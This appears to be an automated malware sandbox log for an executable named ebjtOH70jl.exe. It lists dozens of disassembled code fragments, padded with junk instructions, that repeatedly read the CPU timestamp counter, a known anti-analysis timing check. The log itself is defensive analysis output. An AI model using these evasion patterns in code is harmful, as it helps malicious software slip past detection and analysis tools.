                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D0D056 second address: D0D05F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D1DDF2 second address: D1DE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F0DD1497E66h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d jp 00007F0DD1497E72h 0x00000013 pop esi 0x00000014 pushad 0x00000015 jmp 00007F0DD1497E70h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D1DE27 second address: D1DE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D1DE2D second address: D1DE31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D1DFB7 second address: D1DFD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F0DD08F41B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F0DD08F41B8h 0x00000012 pop ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 jo 00007F0DD08F41B6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D1DFD6 second address: D1DFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D1DFDC second address: D1DFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D1DFE2 second address: D1DFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D1DFEA second address: D1DFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D25108 second address: D2512A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0DD1497E66h 0x0000000a jnc 00007F0DD1497E66h 0x00000010 popad 0x00000011 jnp 00007F0DD1497E6Eh 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D2512A second address: D25139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jnc 00007F0DD08F41B6h 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D2D17C second address: D2D1A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push edi 0x00000008 jmp 00007F0DD1497E75h 0x0000000d pushad 0x0000000e jbe 00007F0DD1497E66h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D3769A second address: D376BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 jmp 00007F0DD08F41C8h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D376BD second address: D376C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C3A373 second address: C3A377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: C3A377 second address: C3A37D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D36126 second address: D3612C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D3612C second address: D36145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F0DD1497E73h 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D36145 second address: D3614F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0DD08F41B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D3614F second address: D36154 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D3651A second address: D3653B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0DD08F41C8h 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D3733A second address: D37346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007F0DD1497E66h 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D37346 second address: D37395 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C2h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F0DD08F41BFh 0x00000011 pop ecx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 pushad 0x00000015 push ecx 0x00000016 jbe 00007F0DD08F41B6h 0x0000001c pop ecx 0x0000001d jmp 00007F0DD08F41C7h 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 pop edi 0x00000026 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D37395 second address: D37399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D3B266 second address: D3B28D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C3h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F0DD08F41BEh 0x00000011 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D3B28D second address: D3B2A2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F0DD1497E6Eh 0x00000008 pop edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D3E356 second address: D3E35C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D3E35C second address: D3E361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D3E361 second address: D3E3A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F0DD08F41B6h 0x00000009 jmp 00007F0DD08F41C6h 0x0000000e jmp 00007F0DD08F41C9h 0x00000013 jno 00007F0DD08F41B6h 0x00000019 popad 0x0000001a pushad 0x0000001b jnl 00007F0DD08F41B6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D4907D second address: D49081 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D49081 second address: D49085 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D49085 second address: D490AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DD1497E6Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F0DD1497E70h 0x00000010 popad 0x00000011 push edi 0x00000012 pushad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D508E6 second address: D5091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DD08F41C6h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F0DD08F41C8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D5F1E1 second address: D5F1E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D5F1E5 second address: D5F1EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D5F1EB second address: D5F1F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0DD1497E66h 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D5ED56 second address: D5ED5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D5ED5C second address: D5ED60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D5ED60 second address: D5ED72 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0DD08F41B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0DD08F41B6h 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D5EEF1 second address: D5EEF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D5EEF8 second address: D5EF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F0DD08F41B6h 0x0000000a jnc 00007F0DD08F41B6h 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7A621 second address: D7A64A instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0DD1497E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jc 00007F0DD1497E66h 0x00000011 jmp 00007F0DD1497E6Eh 0x00000016 jnc 00007F0DD1497E66h 0x0000001c popad 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D794AF second address: D794B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D794B4 second address: D794C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D79D84 second address: D79DA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F0DD08F41C4h 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F0DD08F41B6h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D79DA6 second address: D79DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7A1B0 second address: D7A1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pushad 0x00000006 popad 0x00000007 pop esi 0x00000008 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7A1B8 second address: D7A1C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F0DD1497E66h 0x0000000a jno 00007F0DD1497E66h 0x00000010 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7A1C8 second address: D7A1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7A1CC second address: D7A1E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F0DD1497E66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f js 00007F0DD1497E6Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7A1E3 second address: D7A1FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DD08F41BFh 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7D543 second address: D7D549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7D549 second address: D7D558 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7D558 second address: D7D572 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0DD1497E74h 0x0000000b rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7D572 second address: D7D577 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7D577 second address: D7D57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D7D57D second address: D7D59C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0DD08F41C8h 0x0000000c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D81846 second address: D81850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0DD1497E66h 0x0000000a rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D81850 second address: D81859 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D81859 second address: D81898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F0DD1497E66h 0x0000000c jmp 00007F0DD1497E6Fh 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F0DD1497E6Ch 0x0000001b push edx 0x0000001c jmp 00007F0DD1497E6Fh 0x00000021 push eax 0x00000022 pop eax 0x00000023 pop edx 0x00000024 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D83971 second address: D83975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D83975 second address: D8397B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D8397B second address: D8399E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0DD08F41C9h 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: D8399E second address: D839A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53A011B second address: 53A01C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F0DD08F41BCh 0x00000010 pushfd 0x00000011 jmp 00007F0DD08F41C2h 0x00000016 add ax, 98A8h 0x0000001b jmp 00007F0DD08F41BBh 0x00000020 popfd 0x00000021 pop esi 0x00000022 call 00007F0DD08F41C9h 0x00000027 pushfd 0x00000028 jmp 00007F0DD08F41C0h 0x0000002d and ax, C638h 0x00000032 jmp 00007F0DD08F41BBh 0x00000037 popfd 0x00000038 pop ecx 0x00000039 popad 0x0000003a push eax 0x0000003b pushad 0x0000003c mov dh, ch 0x0000003e push ebx 0x0000003f mov bx, cx 0x00000042 pop eax 0x00000043 popad 0x00000044 xchg eax, ebp 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F0DD08F41C2h 0x0000004c rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53D0016 second address: 53D0025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53D0025 second address: 53D005F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F0DD08F41C3h 0x00000012 pop esi 0x00000013 mov bx, 595Ch 0x00000017 popad 0x00000018 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53D005F second address: 53D006E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53D006E second address: 53D0072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53D0072 second address: 53D0078 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53D0078 second address: 53D0091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0DD08F41BCh 0x00000012 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53D0091 second address: 53D0096 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53601E9 second address: 53601EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53601EF second address: 536023A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b pushad 0x0000000c mov dh, al 0x0000000e pushfd 0x0000000f jmp 00007F0DD1497E71h 0x00000014 or ecx, 488EBF86h 0x0000001a jmp 00007F0DD1497E71h 0x0000001f popfd 0x00000020 popad 0x00000021 push dword ptr [ebp+08h] 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F0DD1497E6Dh 0x0000002b rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 536023A second address: 5360241 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, bh 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380B72 second address: 5380B78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380B78 second address: 5380B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380B7C second address: 5380BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b push ebx 0x0000000c jmp 00007F0DD1497E78h 0x00000011 pop esi 0x00000012 call 00007F0DD1497E6Bh 0x00000017 call 00007F0DD1497E78h 0x0000001c pop eax 0x0000001d pop edx 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380BCE second address: 5380BE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD08F41BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380BE1 second address: 5380BE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53806B5 second address: 53806D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DD08F41C7h 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 53806D0 second address: 5380716 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F0DD1497E6Ch 0x00000013 sbb esi, 134F6CD8h 0x00000019 jmp 00007F0DD1497E6Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 mov ax, D625h 0x00000025 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380716 second address: 5380760 instructions: 0x00000000 rdtsc 0x00000002 call 00007F0DD08F41C2h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F0DD08F41C0h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F0DD08F41C0h 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F0DD08F41BAh 0x00000022 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380760 second address: 538076F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DD1497E6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380640 second address: 5380645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 5380645 second address: 538064B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeRDTSC instruction interceptor: First address: 538064B second address: 538064F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
